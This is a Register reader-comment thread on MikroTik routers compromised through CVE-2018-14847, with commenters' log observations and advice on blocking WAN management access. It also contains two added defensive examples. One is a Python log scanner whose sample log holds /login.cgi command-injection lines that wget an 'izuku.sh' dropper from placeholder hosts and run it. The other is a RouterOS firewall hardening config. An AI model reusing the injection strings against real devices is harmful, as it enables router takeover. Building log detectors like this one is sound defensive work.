Mikrotik routers pwned en masse, send network data to mysterious box

SNMP

Many organisations use the same set of SNMP strings across the business. If you manage to compromise it for one device then you stand to compromise it for everything.

Is that the one I noticed this morning?

Since June there have been a number of requests for '/login.cgi' in my web logs (several hundred) with an obvious code injection exploit in the URL, that wget's a file on a server with a specific IP address (several of these observed, looks like they change periodically) which then loads a binary image for MIPS or ARM processors [as appropriate] into /tmp or one of several other directories that it might be able to download something into...

in any case the script it first downloads is called 'izuku.sh'. I reported my logs and findings to several ISPs who either hosted the machines doing the request, or WERE the host for the downloading.

Not sure if this is the same one the article talks about, but the one I saw has been around since June (according to my logs) and always tries to download that script file which then attempts to download the binary into one of several directories, then load/run it. And I think if you disable remote management on your router, this (apparent) virus won't infect it. But it could be a different one, not the one the article is about. I don't know. So I mention it anyway, just in case. Details are sometimes useful...

Anyway, if you have a web server, look for access attempts for /login.cgi and you'll probably see it (the one I'm talking about). Again, dunno if it's the same as the one in the article, but is similar, probably.

(the first log entry is 15-June at 14:36, in case anybody wonders)
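The check the commenter describes, as an added example that is not part of the original thread: scan a web-server access log for requests to /login.cgi whose query string carries an injected shell command that fetches a dropper script, and pull out the hosts serving that script (the ones you would report to the hosting ISP). The log lines below are constructed to look like such probes; the IP addresses, timestamps and file names in them are placeholders, not observed values, and `/login.cgi` is simply the path the commenter saw.

```python
"""Find /login.cgi command-injection probes in an access log and list the dropper hosts.

Added example, not code from the original thread. SAMPLE_LOG is constructed to resemble the
probes described above; every address and name in it is a placeholder.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache/nginx "combined" format prefix: client, identd, user, timestamp, request line, status, size.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)
# Shell command separators that let a second command ride along in a parameter value.
INJECT_RE = re.compile(r'[;|`]|\$\(|&&')
# Download/execution tools typically named in the injected command.
TOOL_RE = re.compile(r'\b(wget|curl|tftp|busybox)\b', re.I)
# A URL inside the decoded query, terminated by whitespace or shell punctuation.
URL_RE = re.compile(r'''https?://[^\s'"`;|&<>]+''')

# Constructed sample log (placeholder addresses from RFC 5737 ranges).
SAMPLE_LOG = r'''
203.0.113.77 - - [15/Jun/2018:14:36:02 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.9/izuku.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 404 209 "-" "Hello, World"
198.51.100.23 - - [15/Jun/2018:14:36:40 +0000] "GET /index.html HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.78 - - [16/Jun/2018:03:12:11 +0000] "GET /login.cgi?user=admin HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.0.113.79 - - [02/Sep/2018:09:01:55 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://198.51.100.44/izuku.sh%20-O%20/tmp/izuku.sh;sh%20/tmp/izuku.sh%27$ HTTP/1.1" 404 209 "-" "Hello, World"
'''.strip().splitlines()


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse.

    The request target is percent-decoded so the injected shell is readable: the server
    logs the raw %27;wget%20... form, which is why a naive grep for 'wget ' can miss it.
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec['target'] = unquote(rec['target'])
    return rec


def find_probes(lines, path='/login.cgi'):
    """Return one record per request to `path` whose query looks like a download-and-run injection."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path_only, _, query = rec['target'].partition('?')
        if path_only != path:
            continue
        # Require both a command separator and a fetch/exec tool to keep benign queries out.
        if not (INJECT_RE.search(query) and TOOL_RE.search(query)):
            continue
        hits.append({
            'client': rec['client'],
            'ts': rec['ts'],
            'status': rec['status'],          # 404 here: the probe failed, but it still names the dropper host
            'dropper_urls': URL_RE.findall(query),
            'payload': query,
        })
    return hits


def dropper_hosts(hits):
    """Distinct hosts serving the dropper script, sorted: the list to send to the hosting ISPs."""
    return sorted({urlsplit(u).hostname for h in hits for u in h['dropper_urls']})


if __name__ == '__main__':
    found = find_probes(SAMPLE_LOG)
    for h in found:
        print(h['ts'], h['client'], h['status'], ' '.join(h['dropper_urls']))
    print('dropper hosts:', ', '.join(dropper_hosts(found)))
```

The script matches on the decoded query, so doubly-encoded payloads or ones that spell the tool name with escapes would need the decoding step repeated or the tool regex loosened; it also deliberately ignores the client address when deciding, since the scanning hosts change faster than the dropper hosts do.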

Re: Is that the one I noticed this morning?

I'll have to have a look at mine, but the MIPS/ARM binaries will be useless on my CHR.

Besides, if people are exposing the management interface to the outside world, surely they'd firewall it to trusted addresses only, no?

Never underestimate a human's ability to not complete an action properly.

That is a valid remark in all areas of life, but I think it is especially true in IT. Ironically, IT is the only domain where you generally only need a keyboard to do stuff, and even then, people can be too lazy to finish properly.

Sometimes you need a mouse. Especially with Windows... Besides that, couldn't agree more. It's the difference between the sloppy (who are perceived as getting things done) vs the thorough (who are perceived as slow).

Anyway. The current RouterOS doesn't seem to have a fix for this bug. So, blocking the management interface from the outside world it is then! But what's wonderful is that CHR reboots so fast. I don't even have to disconnect from my Citrix session.

Re: Is that the one I noticed this morning?

And when you reported it to the ISPs their response was? No need to reply immediately, I'll check this page again in a couple of years to see if you've heard back at all...

Re: Is that the one I noticed this morning?

unfortunately it seems nothing's been done about the 'izuku.sh' file, though my logs show different IP addresses hosting it now. Yeah, they ignored me. Well that server _IS_ in Poland... they probably can't read or understand the information properly and/or just ignore it because they regularly host criminal services or similar. [I've had 'confirmed kills' before, with responses, just not that often - usually it is silently fixed or seems so because the activity stops]. Another possibility is that they leave it on the server to see what IP addresses download it to track the thing. Well I won't interfere with law enforcement if that's the case.

( I also posted the actual URL on USENET, and described it even better there, so not like it's invisible any more, and anyone can see it in web server logs )

Back at the turn o' the century, Code Red lingered for several years after the initial infections started. Someone (allegedly me perhaps?) allegedly had an auto-responder that would allegedly shut down the Code Red infected web server remotely (since it was attempting to spread a virus) via the Code Red back door command/control channel and (allegedly) leave a file on the administrator desktop that said something like "you are an idiot" and explained why the web server was shut down remotely. Both of those factoids should frighten any clueless admin into patching the thing (as it was most likely some old unpatched "oh we have a web server running?" Win2k box in a closet that nobody thought about). But I digress...

Blocking an external management interface from direct access from the internet is an absolute must. If you have to, VPN access to the box and do it that way. If nothing else the logs on the box fill up with denied SSH requests and the filesystem gets to 100% and the box does funny things up to and including becoming unresponsive...

When people release a list of developed exploits....

perhaps it would be a good idea to start developing upgrades to nullify them first?

SNMP

"....the controller oddly seems to be interested in collecting traffic from the relatively obscure SNMP ports 161 and 162."

One possibility is that there is some other exploit in the wild, that transfers information using SNMP, on the basis that SNMP packets to and from almost any device would not be considered out of the ordinary and would be unlikely to trigger an IDS/IPS.

"from the relatively obscure SNMP ports 161 and 162"

SNMP, obscure? Muahahahaha

Is there any network supervision system not using SNMP?

Vulnerability is overstated

FFS. This vulnerability was fixed days after it was discovered. We are now 7 dot releases past this fix at 6.42.7. Any decent Network administrator needs to be monitoring and updating the firmware of your products.

Secondly the exploit relies on remote access to your router. What complete idiot allows this? Never let external internet access to your router's configuration. Are you completely crazy? I include a URL with the rule to prevent WAN access.

https://0day.city/cve-2018-14847.html

Re: Vulnerability is overstated

I always put a firewall between the outside world and the inside world with a basic "drop all" rule "unless" I specifically permit it.
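The rule the two posts above are arguing for (the one the link is meant to supply, and the "drop all unless permitted" input policy), as an added RouterOS 6 configuration example that is not part of the original thread and is not MikroTik's own guidance text. It assumes the WAN is `ether1` and that administration comes from the placeholder network `192.0.2.0/24`; both are assumptions to substitute for your own. The exposed state is the one the article's victims were in: Winbox (TCP 8291) and the other services answering on every interface with no address restriction and no input-chain drop.

```routeros
# Exposed state (what to check for first): services with an empty "address" column and an
# input chain that never drops WAN traffic leave Winbox/WebFig/SSH reachable from anywhere.
/ip service print
/ip firewall filter print

# 1. Name the networks that are allowed to manage the router (placeholder range, assumption).
/ip firewall address-list add list=mgmt address=192.0.2.0/24 comment="trusted admin networks"

# 2. Bind the management services to those networks and switch off the ones nobody uses.
/ip service set winbox address=192.0.2.0/24
/ip service set ssh address=192.0.2.0/24
/ip service set www address=192.0.2.0/24
/ip service disable telnet
/ip service disable ftp
/ip service disable api
/ip service disable api-ssl

# 3. Input chain for the WAN interface (ether1 is an assumption): keep replies to the
#    router's own sessions, allow management only from the address list, drop the rest.
#    Order matters; the drop rule must be last.
/ip firewall filter add chain=input in-interface=ether1 connection-state=established,related action=accept comment="router's own return traffic"
/ip firewall filter add chain=input in-interface=ether1 src-address-list=mgmt protocol=tcp dst-port=22,8291 action=accept comment="management from trusted networks only"
/ip firewall filter add chain=input in-interface=ether1 action=drop comment="drop everything else arriving on WAN"

# 4. Then actually install the fixed release (CVE-2018-14847 is closed in 6.42.1 and later).
/system package update check-for-updates
/system package update install
```

Add these from a LAN-side session, not over the WAN, and check `/ip firewall filter print` shows the drop rule below the two accept rules before disconnecting; if management must happen from a changing address, the post further up has the right answer, a VPN terminating on the router with the management services bound to the VPN subnet instead of a public range.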

Re: Vulnerability is overstated

yeah that's definitely different from the one I saw [I followed the rabbit trail to a github site with the python code demonstrating the PoC - it's that old yeah]

Anonymous Coward

@marcus - Re: Vulnerability is overstated

What complete idiot implements remote access in a consumer firewall?

Re: @marcus - Vulnerability is overstated

What complete idiot implements remote access in a consumer firewall?

I wouldn't call Mikrotik a consumer firewall. They are squarely aimed at the semi-pro through to carrier market segments.

"What complete idiot implements remote access in a consumer firewall ?"

Simple.

1) Some code monkey that cut and pasted the code from stack exchange

2) Some code monkey that cut and pasted the code from a higher end product and didn't consider if these functions were necessary.

A code monkey is not a code monkey because their coding skills are s**t.

They're a code monkey because of what they choose to do about it.

The Register - Independent news and views for the tech community. Part of Situation Publishing